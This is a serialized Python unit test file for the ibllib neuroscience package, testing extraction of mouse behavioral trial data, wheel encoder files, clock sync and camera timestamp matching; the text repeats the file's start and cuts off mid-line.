self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()\n ]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()\n ]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\nif __name__ == '__main__':\n unittest.main(exit=False, verbosity=2)\n", "<import token>\n\n\ndef wheelMoves_fixture(func):\n \"\"\"Decorator to save some dummy wheelMoves ALF files for extraction tests\"\"\"\n\n @functools.wraps(func)\n def wrapper(obj=None):\n attr_list = ['training_lt5', 'training_ge5', 'biased_lt5', 'biased_ge5'\n ]\n alf_paths = [(getattr(obj, p)['path'] / 'alf') for p in attr_list]\n n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]\n for p, n in zip(alf_paths, n_trials):\n p.mkdir()\n np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))\n np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))\n func(obj)\n for p in alf_paths:\n shutil.rmtree(p)\n return wrapper\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = 